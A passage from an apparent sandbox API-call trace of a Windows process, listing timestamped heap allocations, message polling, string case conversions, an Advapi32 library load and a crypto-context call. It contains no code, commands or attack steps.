lpMsg=0x8bf4b0) returned 0 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.156] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.157] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0260.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.157] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0260.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.158] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.158] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.158] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.158] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.158] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.158] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0260.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0260.158] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.158] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.158] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.158] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.158] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.158] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.159] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.165] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.166] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.166] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0260.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.167] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0260.168] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.168] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.169] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.169] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.170] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.170] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.170] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.170] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 